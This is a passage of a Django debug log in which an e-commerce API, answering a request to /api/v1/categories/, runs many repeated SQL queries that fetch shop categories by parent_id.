"shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:45:15,037 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:45:15,039 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:45:15,043 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:45:15,045 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:45:15,047 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:45:15,049 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:45:15,051 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:45:15,054 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:45:15,057 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:45:15,059 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:45:15,061 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:45:15,064 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:45:15,066 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:45:15,069 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:45:15,071 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:45:15,073 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:45:15,076 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:45:15,078 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:45:15,081 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:45:15,084 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:45:15,086 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:45:15,088 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 06:45:15,090 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 06:45:15,092 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 06:45:15,095 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 06:45:15,097 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 06:45:15,099 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 06:45:15,102 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 06:45:15,104 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 06:45:15] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 06:45:15,260 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 06:45:15,268 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 06:45:15,276 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 06:45:15,282 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 06:45:15,289 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 06:45:15,292 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 06:45:15,296 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 06:45:15,300 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 06:45:15,304 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 06:45:15,309 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 06:45:15,313 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 06:45:15,317 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 06:45:15,319 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 06:45:15,321 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 06:45:15,325 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 06:45:15,328 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 06:45:15,330 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 06:45:15,333 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 06:45:15,335 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 06:45:15,339 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 06:45:15,342 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 06:45:15,345 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 06:45:15,347 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 06:45:15,350 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 06:45:15,352 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 06:45:15,356 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 06:45:15,358 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 06:45:15,360 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 06:45:15,363 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 06:45:15,365 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 06:45:15,369 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 06:45:15,371 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 06:45:15,374 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 06:45:15,376 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 06:45:15,379 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 06:45:15,382 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 06:45:15,385 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 06:45:15,387 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 06:45:15,389 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", 